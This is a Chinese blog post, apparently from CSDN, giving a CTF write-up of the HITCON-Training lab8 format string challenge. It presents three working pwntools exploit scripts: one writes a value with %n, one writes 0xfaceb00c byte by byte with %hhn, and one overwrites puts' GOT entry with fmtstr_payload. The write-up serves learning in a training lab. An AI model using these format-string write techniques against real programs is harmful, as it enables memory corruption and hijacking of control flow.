HITCON-Training lab8(格式化字符串写漏洞)

最新推荐文章于 2023-09-14 20:43:20 发布
最新推荐文章于 2023-09-14 20:43:20 发布
阅读量331 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43935969/article/details/105155599
版权

还在补格式化字符串漏洞的知识,,,,看到这道题的时候,有点懵,,,因为发现218不会整,,,看官方writeup也不太行,,,

 

先知社区上有篇讲的就很好了,,,nice,用了四种方法(最后一种没看懂,,,),,,看完,BJDCTF那道r2t4终于也明白了,感天动地,,,今天就写下前三种方法的种种,,,

 

顺便计算下偏移,反正都会用到

偏移是7

 

方法一

最简单的一种

就是要通过格式化字符串写漏洞,让magic的地址变为218

magic的地址,,,

这样准备工作都完成了,思路就是将放上magic的地址,然后,就可以填充214个字节,然后偏移7个

语句是这样的:p32(magic_addr)+"%0214c"+"%7$n"

                      放上32位地址             填充214字符   将前面的字节(214+4)写入偏移也就是我们输入的东西,magic

这样就成功让magic的内容为218

完整exp

from pwn import *
p=process('./craxme')

magic_addr=0x0804A038

p.recvuntil(":")
payload=p32(magic_addr)+"%0214c"+"%7$n"
p.sendline(payload)

p.interactive()

 

方法二

这个是将magic覆盖成那个很大的负数,这样做也会麻烦一些了,,,

首先我们要将负数用十六进制表示出来

用电脑自带的计算器,程序员模式就行

因为大小端的缘故,我们填入的时候应该是

0c ==> b0 ==> ce ==> fa

发现刚好都是递增,所以,我们可以一个字节一个字节分别写入

意思就是0c写入magic的地址,b0写入magic+1(1个字节),ce写入magic+2,fa写入magic+3,一个地址是四个四节也就是magic~magic+3这个部分,,,

payload2 = p32(magic) + p32(magic+1) + p32(magic+2)+ p32(magic+3) #4x4=16
payload2 += '%252c%7$hhn'  #252+16 =268-->0x10c
payload2 += '%164c%8$hhn'  #268+164 = 432 -->0x1b0
payload2 += '%30c%9$hhn'   #432+30  =462 -->0x1ce
payload2 += '%44c%10$hhn' #462+44 =506 -->0x1fa

【第一个0c是12但是前面的地址就有16所以只能多一位,后面1会被覆盖,所以关系8大】

【%$hn表示写入的地址空间为2字节,%$hhn表示写入的地址空间为1字节,%$lln表示写入的地址空间为8字节】

完整exp:

#coding=utf-8
from pwn import *
p=process('./craxme')
magic_addr=0x0804A038

payload = p32(magic_addr)+p32(magic_addr+1)+p32(magic_addr+2)+p32(magic_addr+3)#4*4=16
payload += '%252c'+'%7$hhn'
payload += '%164c'+'%8$hhn'
payload += '%30c'+'%9$hhn'
payload += '%44c'+'%10$hhn'

p.recvuntil('magic :')
p.sendline(payload)
p.interactive()

【7,8,9,10那个想解释一下,因为自己刚开始看的时候有点迷,四个字节和一个字节的关系,,,没错,前面的数值会是四个字节,只是写入的时候只写入一个字节,%7$偏移刚好是输入的那个东西,也就是第一行payload的p32(magic_addr),%8$走到的地方是payload的第二个p32(magic_addr+1),哈哈哈】

 

这里我们还要介绍一个pwntools用于格式化字符串的函数,可以方便生成payload:

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

 

第一个参数表示格式化字符串的偏移,这里已经知道是7;

第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT: systemAddress};

第三个参数表示已经输出的字符个数,这里没有,为0,采用默认值即可;

第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写。

fmtstr_payload函数返回的就是payload

 

也就是我们中间可以不用这样一步步算出来,直接调用哪个函数,给出我们的偏移,地址,以及我们想要在地址里面写入的地址就行:

payload=fmtstr_payload(7,{magic_addr:0xfaceb00c})

 

方法三

第三种方法就是

我们用函数来直接实现

#coding=utf-8
from pwn import *
p=process('./craxme')
elf=ELF('./craxme')

puts_got=elf.got['puts']
magic_addr=0x0804a038
cat_flag=0x080485D8 #or 0x080485F6

payload=fmtstr_payload(7,{puts_got:cat_flag })

p.recvuntil('magic :')
p.sendline(payload)
p.interactive()

这里需要修改的是got表,因为puts函数根据plt会找到got表来执行,如果用了plt表,接下来还回去找got,,,

 

参考博客:https://xz.aliyun.com/t/3902#toc-10

题目下载:https://github.com/scwuaptx/HITCON-Training

书文的学习记录本
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HITCON-trainning&寒假做题记录
Peanuts
01-28 668
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
HITCON-Training-master lab2 wp
zszcr的博客
04-03 675
查看了下防护机制发现开启了Canary,但是没关系,它没开启堆栈不可执行,说明 这是一道shell code题简单跑了一下程序,发现输出了一句话:give me you shellcodeida反编译查看了下代码代码逻辑也很简单,你输入一段shellcode,然后去执行它我随便去网上找了一段shellcode,输入后发现不行,说明它不是单纯的让我们输入shellcode查看了一下orw_secco...
hitcontraining_uaf
z1r0的博客
12-10 1564
hitcontraining_uaf 查看保护 有uaf,还有后门函数 这里会将show的功能存放在堆里,没有pie所以思路就是将print_note_content这个功能改成magic就可以了,改完show一下就可以执行magic。 申请两个0x10堆, 释放掉,有uaf,没有清0。 这时再申请一个0x8的堆,因为fastbin,填充content时其实就改的是print_note_content。 content放入magic即可。 from pwn import * context(arc
HITCON-Training lab7(一道简单的格式化字符串漏洞
像初雪一样自由洒落
03-27 260
格式化字符串知道他的操作,可是做的一点也不熟练吧,,,BJDCTF上的r2t4不会啊,,,看不懂,,,所以就来补补格式化字符串的题目了,,,, 看到canary开启了,我还以为要泄漏canary呢,结果发现不用那么麻烦,,, 其实看下,思路很清晰,先让你输入东西,然后返回给你,然后你输入password,如果和程序中的一样,你就拿到flag了,, 所以输入的东西里面需要泄漏pa...
hitcontraining_playfmt
最新发布
qq_62887641的博客
09-14 107
32位保护全关存在格式化字符串漏洞,并且是bss段,也就是非栈上的格式化字符串
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
HITCON-ZeroDay年度报告.pdf
08-28
报告中的核心概念是“HITCON-ZeroDay”平台,它承担着多项关键任务,包括确认企业和通报者之间的沟通畅通、验证漏洞的真实性、防止通报者恶意利用漏洞、避免企业逃避责任不修复漏洞、给予通报者奖励(如荣誉和奖金)...
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
HitCon-2015-spartan-0day-exploit:HitCon 2015斯巴达人0day&exploit
05-12
HitCon-2015-spartan-0day-exploit 1、IsolationHeap 2、MemoryProtection 3、Spartan Memory Manage(MemGC) 4、CFG 5、Exploit Bypass All 6、0day 因为与微软的协议,所以PPT中的bypass CFG和0day漏洞的详细细节...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 714
hitcontraining_bamboobox这道题有两种解题方式: house of force 参考:house of force unlink house of force(详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 题目流程 程序一开始申请0x10的块,存放hello_message和.
HIT oslab之实验8 终端设备的控制
南七行者的博客
03-30 394
一、实验内容 修改Linux-0.11的终端设备处理代码,对键盘输入和字符显示进行非常规的控制。 所谓非常规,即:在初始状态,一切如常。用户按一次F12后,把应用程序向终端输出所有字母都替换为*。用户再按一次F12,又恢复正常。 二、实验过程 1.整体思路 ①按下F12,产生键盘中断,而键盘中断的相应函数为keyboard_interrupt。 ②keyboard_interrupt被调用后,会将键盘扫描码做为下标,调用数组 key_table 保存的与F12对应的响应函数。 ③在响应函数中,设置是否
[HITCON 2017]SSRFme
Sk1y的博客
01-14 991
[HITCON 2017]SSRFme 文章目录[HITCON 2017]SSRFmepathinfo()函数payload参考文章 打开题目,就是源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_hea
HITCON-Training lab5(自己构造rop)
像初雪一样自由洒落
03-12 363
看到静态链接,一顿欣喜,直接ropchain生成,栈溢出找出来就ok啦?然后后来发现并没有那么简单。。。 ================================================================================================ 【一段小插曲】 做题的时候突然很奇怪,nx开启,堆栈不可执行,为什么可以执行pop这些指令...
HITCON-Training lab10(uaf入门题)
像初雪一样自由洒落
03-08 735
题目下载地址:https://github.com/scwuaptx/HITCON-Training 哈哈哈,纪念一下明白的第一道堆题,虽然它真的很简单。。。 32位程序 三个功能,增、删、打印 程序给我们预留了后门函数 add函数,创建note会有两个堆块,分别是存放两个函数指针的8字节堆块和存放内容的堆块 这个示意图很清楚: ...
hitcon2023逆向 The Blade WP
Sky_WF的博客
09-11 1173
hitcon2023CTF逆向题The Blade ,rust的程序,萌新记录一下做题过程,程序还是比较复杂的,但关键就是找到有关flag的部分,其他shell命令可以不管
HITCON 2016——PHP反序列化漏洞
qq_41560595的博客
09-18 369
PHP反序列化漏洞典型例题
[HITCON 2016]Leaking沙箱逃逸学习
Y4tacker的博客
02-23 810
[HITCON 2016]Leaking沙箱逃逸学习 node.js 里提供了 vm 模块,相当于一个虚拟机,可以让你在执行代码时候隔离当前的执行环境,避免被恶意代码攻击。但是这道题比较有意思 考点是: node.js中VM2沙箱逃逸 JS通过Buffer 类处理二进制数据的缓冲区 首先给出了题目的源码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var {
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1670
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

书文的学习记录本

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值